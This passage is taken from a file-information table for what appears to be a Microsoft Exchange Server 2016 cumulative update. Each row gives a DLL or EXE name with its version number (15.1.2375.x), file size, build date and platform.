21,392| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.1.2375.17| 13,176| 3-Nov-21| 18:21| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.1.2375.17| 26,000| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.connections.common.dll| 15.1.2375.17| 169,864| 3-Nov-21| 18:43| x86 \nMicrosoft.exchange.connections.eas.dll| 15.1.2375.17| 330,104| 3-Nov-21| 18:43| x86 \nMicrosoft.exchange.connections.imap.dll| 15.1.2375.17| 173,944| 3-Nov-21| 18:43| x86 \nMicrosoft.exchange.connections.pop.dll| 15.1.2375.17| 71,056| 3-Nov-21| 18:43| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.1.2375.17| 203,664| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.context.client.dll| 15.1.2375.17| 27,016| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.context.configuration.dll| 15.1.2375.17| 51,592| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.context.core.dll| 15.1.2375.17| 51,576| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.1.2375.17| 46,968| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.core.strings.dll| 15.1.2375.17| 1,092,488| 3-Nov-21| 18:26| x86 \nMicrosoft.exchange.core.timezone.dll| 15.1.2375.17| 57,232| 3-Nov-21| 18:21| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.1.2375.17| 326,544| 3-Nov-21| 18:10| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.1.2375.17| 3,358,096| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.1.2375.17| 35,704| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.1.2375.17| 17,800| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.data.connectors.dll| 15.1.2375.17| 165,264| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.1.2375.17| 619,384| 3-Nov-21| 19:29| x86 \nMicrosoft.exchange.data.directory.dll| 15.1.2375.17| 7,792,520| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.1.2375.14| 80,264| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.data.dll| 15.1.2375.17| 1,963,384| 3-Nov-21| 19:01| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.1.2375.17| 1,625,976| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.data.ha.dll| 15.1.2375.17| 364,432| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.1.2375.17| 105,352| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.1.2375.17| 15,736| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.1.2375.17| 224,632| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.data.mapi.dll| 15.1.2375.17| 186,256| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.1.2375.17| 39,824| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.data.metering.dll| 15.1.2375.17| 119,176| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.1.2375.17| 968,072| 3-Nov-21| 18:25| x86 \nMicrosoft.exchange.data.notification.dll| 15.1.2375.17| 141,192| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.1.2375.17| 769,416| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.data.providers.dll| 15.1.2375.17| 139,640| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.data.provisioning.dll| 15.1.2375.17| 56,720| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.1.2375.17| 452,496| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.1.2375.17| 32,656| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.1.2375.17| 256,376| 3-Nov-21| 18:21| x86 \nMicrosoft.exchange.data.storage.dll| 15.1.2375.17| #########| 3-Nov-21| 19:21| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.1.2375.14| 37,776| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.1.2375.17| 655,752| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.1.2375.17| 174,480| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.1.2375.17| 36,240| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.1.2375.17| 14,200| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.1.2375.14| 14,200| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.1.2375.14| 14,728| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.1.2375.17| 72,568| 3-Nov-21| 20:35| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.1.2375.17| 13,200| 3-Nov-21| 18:36| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.1.2375.17| 22,920| 3-Nov-21| 19:17| x86 \nMicrosoft.exchange.diagnostics.dll| 15.1.2375.17| 1,813,368| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.diagnostics.dll.deploy| 15.1.2375.17| 1,813,368| 3-Nov-21| 18:22| Not applicable \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.1.2375.17| 23,928| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.1.2375.17| 546,680| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.1.2375.17| 215,432| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.1.2375.17| 193,408| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.1.2375.17| 146,296| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.1.2375.17| 27,512| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.1.2375.17| 13,712| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.1.2375.17| 49,536| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.1.2375.17| 28,040| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.1.2375.17| 208,776| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.1.2375.17| 88,952| 3-Nov-21| 18:12| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.1.2375.17| 32,656| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.1.2375.17| 45,968| 3-Nov-21| 20:13| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.1.2375.17| 18,808| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.dxstore.dll| 15.1.2375.17| 468,872| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.1.2375.14| 206,200| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.1.2375.17| 36,728| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.1.2375.17| 131,464| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.1.2375.17| 21,904| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.1.2375.17| 148,368| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.1.2375.17| 220,040| 3-Nov-21| 19:21| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.1.2375.17| 23,928| 3-Nov-21| 18:26| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.1.2375.17| 97,672| 3-Nov-21| 19:17| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.1.2375.17| 1,266,064| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.1.2375.17| 1,266,064| 3-Nov-21| 18:22| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,506| 3-Nov-21| 18:36| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.1.2375.17| 87,432| 3-Nov-21| 18:25| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,491| 3-Nov-21| 18:28| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.1.2375.17| 52,088| 3-Nov-21| 18:12| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.1.2375.17| 294,264| 3-Nov-21| 20:02| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.1.2375.17| 72,584| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.1.2375.17| 45,960| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.entities.booking.dll| 15.1.2375.17| 218,000| 3-Nov-21| 20:16| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.1.2375.17| 78,216| 3-Nov-21| 19:30| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.1.2375.17| 35,704| 3-Nov-21| 19:30| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.1.2375.17| 932,216| 3-Nov-21| 20:08| x86 \nMicrosoft.exchange.entities.common.dll| 15.1.2375.17| 336,272| 3-Nov-21| 19:29| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.1.2375.17| 52,624| 3-Nov-21| 19:29| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.1.2375.17| 32,128| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.entities.context.dll| 15.1.2375.17| 60,792| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.1.2375.17| 854,416| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.1.2375.17| 290,696| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.1.2375.17| 39,312| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.1.2375.17| 76,176| 3-Nov-21| 20:10| x86 \nMicrosoft.exchange.entities.insights.dll| 15.1.2375.17| 166,776| 3-Nov-21| 20:14| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.1.2375.17| 1,486,728| 3-Nov-21| 20:15| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.1.2375.17| 122,248| 3-Nov-21| 20:10| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.1.2375.17| #########| 3-Nov-21| 20:19| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.1.2375.17| 263,560| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.entities.people.dll| 15.1.2375.17| 37,768| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.1.2375.17| 186,768| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.1.2375.17| 64,400| 3-Nov-21| 20:12| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.1.2375.17| 83,848| 3-Nov-21| 20:16| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.1.2375.17| 63,864| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.1.2375.17| 99,728| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.1.2375.17| 144,760| 3-Nov-21| 19:30| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.1.2375.17| 270,224| 3-Nov-21| 20:10| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.1.2375.17| 15,240| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.1.2375.17| 15,760| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.eserepl.dll| 15.1.2375.17| 131,984| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.1.2375.17| 254,328| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.1.2375.17| 13,176| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.1.2375.17| 37,240| 3-Nov-21| 20:34| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.1.2375.17| 641,928| 3-Nov-21| 18:54| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.1.2375.17| 37,256| 3-Nov-21| 19:30| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.1.2375.17| 146,296| 3-Nov-21| 20:44| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.1.2375.17| 13,176| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.1.2375.17| 594,320| 3-Nov-21| 20:44| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.1.2375.14| 14,736| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.1.2375.17| 30,072| 3-Nov-21| 21:31| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.1.2375.17| 99,704| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.1.2375.17| 42,360| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.helpprovider.dll| 15.1.2375.17| 40,824| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.1.2375.17| 54,144| 3-Nov-21| 20:08| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.1.2375.17| 163,720| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.1.2375.17| 58,744| 3-Nov-21| 20:06| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.1.2375.17| 204,664| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.1.2375.17| 17,792| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.1.2375.17| 30,600| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.1.2375.17| 38,792| 3-Nov-21| 20:10| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.1.2375.17| 48,528| 3-Nov-21| 20:08| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.1.2375.17| 180,624| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.1.2375.17| 36,752| 3-Nov-21| 20:44| x86 \nMicrosoft.exchange.httprequestfiltering.dll| 15.1.2375.17| 28,024| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.httputilities.dll| 15.1.2375.17| 26,000| 3-Nov-21| 20:08| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.1.2375.17| 1,868,152| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.1.2375.17| 54,672| 3-Nov-21| 18:10| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.1.2375.17| 35,728| 3-Nov-21| 20:37| x86 \nMicrosoft.exchange.idserialization.dll| 15.1.2375.17| 35,704| 3-Nov-21| 18:10| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.1.2375.14| 18,312| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.1.2375.14| 18,312| 3-Nov-21| 18:09| Not applicable \nMicrosoft.exchange.imap4.exe| 15.1.2375.17| 262,544| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.1.2375.17| 262,544| 3-Nov-21| 19:47| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.1.2375.17| 24,968| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.1.2375.17| 24,968| 3-Nov-21| 19:47| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.1.2375.17| 53,112| 3-Nov-21| 18:36| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.1.2375.17| 216,952| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.1.2375.17| 32,144| 3-Nov-21| 20:14| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.1.2375.17| 282,000| 3-Nov-21| 20:12| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.1.2375.17| 18,808| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.1.2375.17| 83,848| 3-Nov-21| 20:09| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.1.2375.17| 15,224| 3-Nov-21| 18:26| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.1.2375.17| 94,072| 3-Nov-21| 18:21| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.1.2375.17| 1,841,528| 3-Nov-21| 20:02| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.1.2375.17| 71,544| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.1.2375.17| 175,480| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.1.2375.17| 45,960| 3-Nov-21| 18:10| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.1.2375.17| 159,608| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.1.2375.17| 51,064| 3-Nov-21| 18:12| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.1.2375.14| 45,960| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.1.2375.17| 30,608| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.1.2375.17| 100,232| 3-Nov-21| 18:21| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.1.2375.17| 13,200| 3-Nov-21| 18:12| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.1.2375.17| 271,240| 3-Nov-21| 20:47| x86 \nMicrosoft.exchange.killswitch.dll| 15.1.2375.17| 22,392| 3-Nov-21| 18:10| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.1.2375.17| 33,672| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.1.2375.17| 18,312| 3-Nov-21| 18:21| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.1.2375.17| 15,248| 3-Nov-21| 18:21| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.1.2375.17| 27,528| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.1.2375.17| 30,600| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.1.2375.17| 22,408| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.1.2375.17| 66,440| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.1.2375.17| 29,584| 3-Nov-21| 18:27| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.1.2375.17| 19,848| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.1.2375.17| 20,368| 3-Nov-21| 18:21| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.1.2375.17| 19,344| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.1.2375.17| 34,168| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.1.2375.17| 103,800| 3-Nov-21| 18:21| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.1.2375.17| 31,616| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.1.2375.17| 15,736| 3-Nov-21| 18:27| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.1.2375.17| 20,872| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.1.2375.17| 16,272| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.1.2375.17| 49,032| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.1.2375.17| 44,424| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.1.2375.17| 38,288| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.1.2375.17| #########| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.1.2375.17| 29,048| 3-Nov-21| 18:21| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.1.2375.17| 21,376| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.1.2375.17| 24,456| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.1.2375.17| 15,240| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.1.2375.17| 21,888| 3-Nov-21| 18:21| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.1.2375.17| 89,464| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.1.2375.17| 20,880| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.1.2375.17| 26,512| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.1.2375.17| 21,376| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.1.2375.17| 28,040| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.1.2375.17| 28,536| 3-Nov-21| 18:21| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.1.2375.17| 36,240| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.1.2375.17| 16,784| 3-Nov-21| 18:26| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.1.2375.17| 19,848| 3-Nov-21| 18:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.1.2375.17| 15,248| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.1.2375.17| 17,288| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.1.2375.17| 19,856| 3-Nov-21| 18:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.1.2375.17| 57,232| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.1.2375.17| 17,792| 3-Nov-21| 18:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.1.2375.17| 18,832| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.1.2375.17| 16,264| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.1.2375.17| 17,800| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.1.2375.17| 15,224| 3-Nov-21| 18:26| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.1.2375.17| 15,240| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.1.2375.17| 52,616| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.1.2375.17| 18,312| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.1.2375.17| 34,192| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.1.2375.17| 17,288| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.1.2375.17| 18,816| 3-Nov-21| 18:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.1.2375.17| 43,392| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.loguploader.dll| 15.1.2375.17| 165,264| 3-Nov-21| 18:45| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.1.2375.17| 54,648| 3-Nov-21| 18:43| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.1.2375.17| 9,063,800| 3-Nov-21| 21:18| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.1.2375.17| 33,152| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.1.2375.17| 124,304| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.1.2375.17| 82,808| 3-Nov-21| 18:12| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.1.2375.17| 14,224| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.1.2375.17| 30,072| 3-Nov-21| 20:06| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.1.2375.17| 661,368| 3-Nov-21| 20:18| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.1.2375.17| 63,368| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.1.2375.17| 175,480| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.1.2375.17| 2,785,672| 3-Nov-21| 20:05| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.1.2375.17| 53,112| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.1.2375.17| 151,416| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.1.2375.17| 966,520| 3-Nov-21| 20:16| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.1.2375.17| 185,232| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.1.2375.17| 31,608| 3-Nov-21| 18:27| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.1.2375.17| 39,800| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.1.2375.17| 105,848| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.1.2375.17| 94,584| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.1.2375.17| 43,384| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.1.2375.17| 18,832| 3-Nov-21| 18:25| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.1.2375.17| 172,936| 3-Nov-21| 20:15| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.1.2375.17| 102,264| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.1.2375.17| 98,680| 3-Nov-21| 20:06| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.1.2375.17| 188,808| 3-Nov-21| 20:10| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.1.2375.17| 43,400| 3-Nov-21| 20:09| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.1.2375.14| 447,368| 3-Nov-21| 18:09| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.1.2375.17| 90,000| 3-Nov-21| 20:12| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.1.2375.17| 107,912| 3-Nov-21| 21:33| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.1.2375.17| 371,088| 3-Nov-21| 20:19| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.1.2375.17| 193,912| 3-Nov-21| 20:01| x86 